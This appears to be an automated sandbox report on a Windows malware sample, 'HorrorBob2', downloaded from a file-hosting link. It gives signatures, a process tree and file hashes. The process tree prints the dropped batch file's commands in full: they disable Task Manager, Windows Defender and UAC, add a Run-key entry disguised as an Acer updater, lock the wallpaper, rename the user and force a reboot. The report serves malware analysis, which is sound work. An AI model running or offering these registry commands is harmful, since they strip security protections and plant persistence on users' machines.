Analysis

  • max time kernel
    21s
  • max time network
    23s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/05/2025, 15:18

Errors

Reason
Machine shutdown

General

  • Target

    https://gofile.io/d/ecYbbf

Malware Config

Signatures

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/ecYbbf
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5112
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8e5a4dcf8,0x7ff8e5a4dd04,0x7ff8e5a4dd10
      2⤵
        PID:5924
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1564,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2068 /prefetch:3
        2⤵
        • Downloads MZ/PE file
        PID:1916
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2044,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2040 /prefetch:2
        2⤵
          PID:6128
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2200,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2512 /prefetch:8
          2⤵
            PID:1584
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2952,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2976 /prefetch:1
            2⤵
              PID:1632
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2964,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3016 /prefetch:1
              2⤵
                PID:4456
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4136,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4148 /prefetch:2
                2⤵
                  PID:4936
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4680,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4708 /prefetch:1
                  2⤵
                    PID:4580
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4408,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3020 /prefetch:1
                    2⤵
                      PID:2460
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5548,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5572 /prefetch:8
                      2⤵
                        PID:6120
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5568,i,3638664393125625333,1414262358886866268,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5472 /prefetch:8
                        2⤵
                          PID:452
                        • C:\Users\Admin\Downloads\HorrorBob2.exe
                          "C:\Users\Admin\Downloads\HorrorBob2.exe"
                          2⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5004
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A73C.tmp\HorrorBob2.bat" "
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4156
                            • C:\Windows\SysWOW64\cscript.exe
                              cscript prompt.vbs
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1280
                            • C:\Windows\SysWOW64\reg.exe
                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:2344
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
                              4⤵
                              • Sets desktop wallpaper using registry
                              • System Location Discovery: System Language Discovery
                              PID:4036
                            • C:\Windows\SysWOW64\rundll32.exe
                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:6052
                            • C:\Windows\SysWOW64\reg.exe
                              reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:4456
                            • C:\Windows\SysWOW64\reg.exe
                              Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                              4⤵
                              • Modifies Windows Defender DisableAntiSpyware settings
                              • System Location Discovery: System Language Discovery
                              PID:4768
                            • C:\Windows\SysWOW64\reg.exe
                              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                              4⤵
                              • UAC bypass
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:3732
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
                              4⤵
                              • Adds Run key to start application
                              • System Location Discovery: System Language Discovery
                              PID:4732
                            • C:\Windows\SysWOW64\net.exe
                              net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2756
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:2988
                            • C:\Windows\SysWOW64\shutdown.exe
                              shutdown /r /t 00
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5472
                      • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                        1⤵
                          PID:5588
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                          1⤵
                            PID:5088
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c C:\Service64\Service64.exe
                            1⤵
                              PID:4816
                              • C:\Service64\Service64.exe
                                C:\Service64\Service64.exe
                                2⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:4392
                            • C:\Windows\system32\LogonUI.exe
                              "LogonUI.exe" /flags:0x4 /state0:0xa3977055 /state1:0x41c64e6d
                              1⤵
                              • Modifies data under HKEY_USERS
                              • Suspicious use of SetWindowsHookEx
                              PID:3376

                            Network

                                  MITRE ATT&CK Enterprise v16

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                    Filesize

                                    649B

                                    MD5

                                    be5ee66b9f3b8e5e873e8ae3a24a9067

                                    SHA1

                                    3085fcf7a958c0e7eefc4c5dfcca19215b47e74e

                                    SHA256

                                    f3c8e739ae743a5cc49d36d40466efa61f0e7be44e03fdd9b6c6b5b88ea83249

                                    SHA512

                                    25298a3804aec81a821d19360e061cee4af4a8d865dce8dfcc97c5148b8b8716cd7ba295d822878f6becaa7877f429f54651bd8128d87f56f363bb4a8b2ccf67

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                    Filesize

                                    2B

                                    MD5

                                    d751713988987e9331980363e24189ce

                                    SHA1

                                    97d170e1550eee4afc0af065b78cda302a97674c

                                    SHA256

                                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                    SHA512

                                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                    Filesize

                                    10KB

                                    MD5

                                    090b6b9eab28e5e9c783c5dd99782363

                                    SHA1

                                    9112ed481b321b35b60ead650033e01bb79d4c10

                                    SHA256

                                    192f9f3be5f65bfdf75bf11bc907e2db9c8f971a385513f1a51e154bf8cc45ce

                                    SHA512

                                    5a68ae0c568e4d454cfc059d38646b8a9e03f0b7c35e360416ae5e3c0c3d5c3e6a0ad2d01b913bb72bd393ee5f9ec47160e344f07a18da6dcee2986ac45b13bd

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                    Filesize

                                    10KB

                                    MD5

                                    9e53b089623a9f4f7ea7a3ba6d707304

                                    SHA1

                                    a0454a38077118d0efc3384594b556857e8028e2

                                    SHA256

                                    87ccb44e5066a0b7932db8e9743168f3214c4c753bfa1a0da803d307f39d87ba

                                    SHA512

                                    8a0bdc7ff1a24654c8b9a554ce023411f406772ee7f80ce2d8f06b89431e48b21b2b450abf05452e49a42ae9d07e3f74de4c48c778867c32347dfdffd83d90bd

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                    Filesize

                                    15KB

                                    MD5

                                    6110e3e944deef222e30e13466a87806

                                    SHA1

                                    74dcd3f70e7f521aebacc4c8c119a3c51c11e7f4

                                    SHA256

                                    5956798455cc35787313c4c31ffdc3cd5795833980ce1203d997ebbc0e941359

                                    SHA512

                                    d72175441abe81e11de81b0b204381bb23ece86507665e9ca820c4938f6b7e9af909db803214453bf5689d62dee8090cceeb2c11813e9a64435197151abe1546

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                    Filesize

                                    79KB

                                    MD5

                                    83f20037e4fbe3212e0e1c3be63c5052

                                    SHA1

                                    99617ff735d86d26be18aee21848cf17011cd4a4

                                    SHA256

                                    e1d826b1393205c1d6442b87fc35e47ef9fda8ccf2147b9de1c6165f47ea1b8d

                                    SHA512

                                    364270064b63df9524447516f4008428df7aab9da3991932cc760da394526a470d500989c07b155c7111235d3c0464580f48eb750f0e35fd6593bd4a5c6b29f3

                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                    Filesize

                                    80KB

                                    MD5

                                    61197b2bf7b65ddb761c9e158ba94975

                                    SHA1

                                    85b150898278139324a8a7bb4dcc64111c0d0486

                                    SHA256

                                    0b2b8ed3ac3b40c908fb81407b389d0a15ae88ad63ac885473f041edb853d20f

                                    SHA512

                                    e0cfd2967648b8f30a0d25dd5a83e9186dfa1d0810fd88357eacd156e57956d9fd2cd69721ff3fda83415b519c63a97066c8bf648ae3346693e27bd5d42910a1

                                  • C:\Users\Admin\AppData\Local\Temp\A73C.tmp\HorrorBob2.bat

                                    Filesize

                                    5KB

                                    MD5

                                    b11c0b55dba339bbe3169584fa0eedd8

                                    SHA1

                                    8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9

                                    SHA256

                                    f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073

                                    SHA512

                                    8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

                                  • C:\Users\Admin\AppData\Local\Temp\A73C.tmp\Service64.exe

                                    Filesize

                                    11.4MB

                                    MD5

                                    b53852cb556ec28efc39b986caddb791

                                    SHA1

                                    5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a

                                    SHA256

                                    ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a

                                    SHA512

                                    7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599

                                  • C:\Users\Admin\AppData\Local\Temp\A73C.tmp\blood.bmp

                                    Filesize

                                    3.8MB

                                    MD5

                                    040d29b801e3488f7aee3f9708128eea

                                    SHA1

                                    433591a971325f7529cbb7a1d16645ff65ee10c7

                                    SHA256

                                    fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de

                                    SHA512

                                    79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826

                                  • C:\Users\Admin\AppData\Local\Temp\A73C.tmp\prompt.vbs

                                    Filesize

                                    207B

                                    MD5

                                    52ac951762c9b42fb4492dfdde2ba4ae

                                    SHA1

                                    0821a0dea46432fc4db10a2dc6312d42a872ab9f

                                    SHA256

                                    9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3

                                    SHA512

                                    c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530

                                  • C:\Users\Admin\Downloads\Unconfirmed 877683.crdownload

                                    Filesize

                                    11.9MB

                                    MD5

                                    9331b20120075b2685d3888c196f2e34

                                    SHA1

                                    1af7d3dc4576ef8aaa06fa3199cf422b7657950b

                                    SHA256

                                    98a804d373c7e0e4f80155df20358436e066ecf31c522c31df2ba46923ac68c2

                                    SHA512

                                    83636067d46b1362a6e0e5af56222d170d337fa7b0c4048b8f04c9df0ca35c3634a7254e6226886b00f9894e4353d6ac6b2e4e760bab320058cebe37c7c0cd7b

                                  • memory/4392-125-0x0000000000400000-0x00000000012E3000-memory.dmp

                                    Filesize

                                    14.9MB

                                  • memory/4392-146-0x0000000000400000-0x00000000012E3000-memory.dmp

                                    Filesize

                                    14.9MB

                                  • memory/5004-85-0x0000000000400000-0x000000000132F000-memory.dmp

                                    Filesize

                                    15.2MB

                                  • memory/5004-126-0x0000000000400000-0x000000000132F000-memory.dmp

                                    Filesize

                                    15.2MB